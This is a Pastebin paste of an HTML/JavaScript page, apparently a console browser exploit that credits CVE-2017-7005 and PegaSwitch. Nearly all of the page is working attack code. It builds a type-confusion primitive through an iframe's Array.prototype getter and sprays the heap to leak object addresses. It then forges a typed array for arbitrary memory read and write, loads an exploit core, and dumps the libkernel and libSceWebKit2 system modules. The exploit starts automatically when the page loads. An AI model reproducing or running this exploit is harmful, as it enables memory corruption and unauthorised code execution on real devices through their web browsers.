API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Mar 15th, 2018
197
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 12.83 KB | None | 0 0
raw download clone embed print report
  1.  
  2. <body>
  3.  
  4. <head>
  5. <script src="./data/utils/jquery.min.js"></script>
  6. <script src="./data/utils/utils.js"></script>
  7. <script src="./data/utils/utils.log.js"></script>
  8. <script src="./data/sploitcore.js"></script>
  9. <script src="./data/rop.js"></script>
  10. <script src="./data/syscalls.js"></script>
  11. <script src="./data/gadgets.js"></script>
  12. </head>
  13. <body background="http://backgroundcheckall.com/wp-content/uploads/2017/12/background-image-for-website-2.jpg">
  14. Beta
  15. <body>
  16. <center>
  17.  
  18. RE CODE By <a href="https://twitter.com/xiranozer">XiRaLxRd</a><br>
  19. Original by ALEXZZZ9<br>
  20. Based on:<br>
  21. <a href="https://bugs.chromium.org/p/project-zero/issues/detail?id=1208">CVE-2017-7005</a><br>
  22. <a href="https://github.com/reswitched/pegaswitch">PegaSwitch</a> <a href="https://github.com/reswitched/pegaswitch/blob/master/LICENSE.md">(Copyright 2017 ReSwitched Team)</a><br>
  23. 4.0x exploit by <a href="https://twitter.com/qwertyoruiopz">qwertyoruiopz</a><br>
  24. <br>
  25. This exploit supports 5.01>5.05 (support Beta 5.50)
  26. Version : 1.5 <br>
  27. </center>
  28. <center id="buttons" style="visibility:hidden;">
  29. <input id="go" type="button" onclick="restart()" value="Restart"><br>
  30. <br>
  31. <input id="go" type="button" onclick="dump('libkernel')" value="Dump libkernel"><br>
  32. <input id="go" type="button" onclick="dump('libSceWebKit2')" value="Dump libSceWebKit2"><br>
  33. </center>
  34.  
  35. <div class="footer">
  36. <h5>===== COMPLETE EXPLOIT LOGS =====</h5>
  37. <pre id="log"></pre>
  38. </div>
  39.  
  40. <script>
  41. var mainDebugLog = true;
  42. var done = true;
  43. var tryCount = 0;
  44. var tryCountMax = 2;
  45.  
  46.  
  47. function start() {
  48. _dview = undefined;
  49.  
  50. if (mainDebugLog) log('>> Exploit Starting .');
  51. buildObject(0, 0, function(b) {
  52. buildObject(0x1337, 0x1, function(d) {
  53. var sid = 1;
  54. var magic = {
  55. 'a': u2d(sid, 0x1602300 - 0x10000),
  56. 'b': b,
  57. 'c': u2d(1, 2),
  58. 'd': d
  59. };
  60. d = 0;
  61. b = 0;
  62.  
  63. var bstore = new ArrayBuffer(0x10 * 4);
  64. var rwmagic = new Uint32Array(bstore);
  65. var leakee = {
  66. 'b': null
  67. };
  68. var leaker = {
  69. 'a': leakee
  70. };
  71. leakAddrs(magic, rwmagic, leaker, function(err, magicaddr, rwaddr, leakeraddr) {
  72. if (err) {
  73. debug_log(`>> Error leaking : ${err}`);
  74.  
  75. tryCount += 1;
  76.  
  77. if (!done && tryCount < tryCountMax) {
  78. debug_log(`>> Retry #${tryCount}`);
  79. restart();
  80. } else {
  81. debug_log(`>> Please wait for Auto Reload !`);
  82. resetCount();
  83. setTimeout(function(){
  84. window.location.reload(1);
  85. }, 5000);
  86. }
  87. return;
  88. }
  89. resetCount();
  90.  
  91. buildObject(rwaddr[0], rwaddr[1], function(c) {
  92. magic.c = c;
  93. c = 0;
  94. buildObject(magicaddr[0] + 4 * 4, magicaddr[1], function(o) {
  95. while (sid < 0x10000 && !(o instanceof Uint32Array)) {
  96. magic.a = u2d(++sid, 0x1602300 - 0x10000);
  97. }
  98. if (!(o instanceof Uint32Array)) {
  99. debug_log('>> Could not find structure ID!');
  100. return;
  101. }
  102.  
  103. var save = [o[4], o[5], o[6]];
  104.  
  105. o[4] = leakeraddr[0];
  106. o[5] = leakeraddr[1];
  107. o[6] = 0x1337;
  108.  
  109. var va = new Uint32Array(bstore);
  110. var vb = new Uint32Array(bstore);
  111. leaker['a'] = leakee;
  112. leakee['b'] = {
  113. 'a': va
  114. };
  115. var leakaddr = [rwmagic[4], rwmagic[5]];
  116.  
  117. o[4] = leakaddr[0];
  118. o[5] = leakaddr[1];
  119. var ta = [rwmagic[4], rwmagic[5]];
  120. o[4] = ta[0];
  121. o[5] = ta[1];
  122. var addra = [rwmagic[4], rwmagic[5]];
  123.  
  124. o[4] = leakaddr[0];
  125. o[5] = leakaddr[1];
  126. leakee['b'] = {
  127. 'a': vb
  128. };
  129. ta = [rwmagic[4], rwmagic[5]];
  130. o[4] = ta[0];
  131. o[5] = ta[1];
  132. var addrb = [rwmagic[4], rwmagic[5]];
  133.  
  134. o[4] = addra[0];
  135. o[5] = addra[1];
  136. rwmagic[4] = addrb[0];
  137. rwmagic[5] = addrb[1];
  138.  
  139. o[4] = save[0];
  140. o[5] = save[1];
  141. o[6] = save[2];
  142. rwmagic = 0;
  143. // magic.a = 0;
  144. magic.b = 0;
  145. magic.c = 0;
  146. magic.d = 0;
  147. o = 0;
  148. // save = 0;
  149. debug_log('~~~~~~~~~~ WebKit Exploit Succeeded ~~~~~~~~~~');
  150. debug_log('~~~~~~~~~~ You Can Now Dump LibKernel and LibSceWebkit2 ! ~~~~~~~~~~');
  151.  
  152. loadCore({
  153. bstore: bstore,
  154. va: va,
  155. vb: vb,
  156. leakee: leakee,
  157. leakaddr: leakaddr
  158. });
  159. });
  160. });
  161. });
  162. });
  163. });
  164. };
  165.  
  166. function restart() {
  167. clearLog();
  168.  
  169. setTimeout(function() {
  170. start();
  171. }, 100);
  172. }
  173.  
  174. function resetCount() {
  175. tryCount = 0;
  176. done = false;
  177. }
  178.  
  179.  
  180. function buildObject(lo, hi, cb) {
  181. if (mainDebugLog) log('Building stuff.');
  182. var a = [0, 4.243991582e-314, u2d(lo, hi), 3.5e-323, 3.5e-323];
  183. var f = document.body.appendChild(document.createElement('iframe'));
  184.  
  185. f.contentWindow.Array.prototype.__defineGetter__(100, function() {
  186. return 1
  187. });
  188.  
  189. var sub = f.contentWindow.Array.prototype.slice.call(a, 0, 4);
  190.  
  191. f.remove();
  192. cb(sub[0]);
  193. }
  194.  
  195. function leakAddrs(obja, objb, objc, cb) {
  196. if (mainDebugLog) log('Attempting leak...');
  197. var numbufs = 100 * 8;
  198. var numchunks = 5000;
  199. var chunks = new Array(numchunks);
  200. var validator = ~~(Math.random() * 0x10000);
  201. var vj = u2d(validator, 0);
  202.  
  203. if (mainDebugLog) log(`validator=0x${validator.toString(16)}`);
  204.  
  205. function checkState(state) {
  206. if (mainDebugLog) log('Checking...');
  207. var elementCount = state.width * state.height / 4;
  208. var rb = new Uint32Array(state.data.buffer);
  209. var f = false;
  210. for (var i = 0; i < elementCount; ++i) {
  211. if (rb[i] === validator && rb[i + 1] === 0x10000 &&
  212. rb[i + 2] !== 0 && rb[i + 4] !== 0 && rb[i + 6] !== 0 &&
  213. rb[i + 2] !== rb[i + 4] && rb[i + 3] < 0x100 && rb[i + 5] < 0x100
  214. ) {
  215. if (mainDebugLog) debug_log('Found data. ' + i);
  216.  
  217. done = true;
  218.  
  219. if (mainDebugLog) {
  220. var tmpArr = [];
  221.  
  222. for (var j = 0; j < 12; ++j) {
  223. tmpArr.push(`0x${rb[i + j].toString(16)}`);
  224. }
  225.  
  226. debug_log(`data=${JSON.stringify(tmpArr)}`);
  227. }
  228.  
  229. return cb(null, [rb[i + 2], rb[i + 3]], [rb[i + 4], rb[i + 5]], [rb[i + 6], rb[i + 7]]);
  230. }
  231. }
  232.  
  233. return cb('Not Found', null, null, null);
  234. }
  235.  
  236. var id = new ImageData(1, 1 * 1024 * 1024 / 4);
  237.  
  238. if (mainDebugLog) log('Allocating...');
  239. for (var j = 0; j < numchunks; ++j) {
  240. var bufs = chunks[j] = new Array(numbufs);
  241. for (var i = 0; i < numbufs; i += 4) {
  242. bufs[i] = vj;
  243. bufs[i + 1] = obja;
  244. bufs[i + 2] = objb;
  245. bufs[i + 3] = objc;
  246. }
  247. bufs = 0;
  248. }
  249. for (var j = 0; j < numchunks; ++j) {
  250. delete chunks[j];
  251. }
  252. postMessage('', '*', [id.data.buffer]);
  253. history.pushState(id, '');
  254. setTimeout(function() {
  255. checkState(history.state);
  256. }, 0);
  257. }
  258.  
  259.  
  260. function loadCore(obj) {
  261. debug_log('~~~~~~~~~~Loadig Exploit Core~~~~~~~~~~');
  262. var ECore = new SploitCore(obj);
  263. window.ECore = ECore;
  264.  
  265. document.getElementById("buttons").removeAttribute("style");
  266. }
  267.  
  268.  
  269. function dump(module) {
  270. var size1KB = (0x10 * 64) * 1;
  271. var size16KB = (0x10 * 64) * 16;
  272. var size32KB = (0x10 * 64) * 32;
  273. var size64KB = (0x10 * 64) * 64;
  274. var size128KB = (0x10 * 64) * 128;
  275. var size512KB = (0x10 * 64) * 128 * 4;
  276. var size1MB = (0x10 * 64) * 128 * 8;
  277.  
  278. if (module === 'libkernel') {
  279. ECore.memDump(window.ECore.moduleBaseAddresses['libkernel'], 0x7FFFF, `libkernel.sprx`, false);
  280. } else if (module === 'libSceWebKit2') {
  281. var dumpAddress = ECore.base;
  282. var dumpSize = size1MB * 3;
  283. var dumpOffset = 0;
  284. var stopDump = false;
  285. var dumpNumber = 0;
  286.  
  287. while (!stopDump) {
  288. dumpNumber++;
  289.  
  290. if (dumpNumber === 19) {
  291. dumpSize = size128KB;
  292. }
  293.  
  294. if (dumpNumber === 60) stopDump = true;
  295.  
  296. if (dumpNumber > 1) dumpOffset += dumpSize;
  297.  
  298. debug_log(`Dump #${dumpNumber} (Address:${paddr(add2(dumpAddress, dumpOffset))} | Offset:${dumpOffset} | Size: ${dumpSize})`);
  299.  
  300. ECore.memDump(add2(dumpAddress, dumpOffset), dumpSize, `libSceWebKit2.sprx`, true);
  301. }
  302. }
  303. }
  304. </script>
  305.  
  306. <script>
  307. setTimeout(function() {
  308. document.getElementById('go').click();
  309. }, 100);
  310. </script>
  311. </body>
  312. </body>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!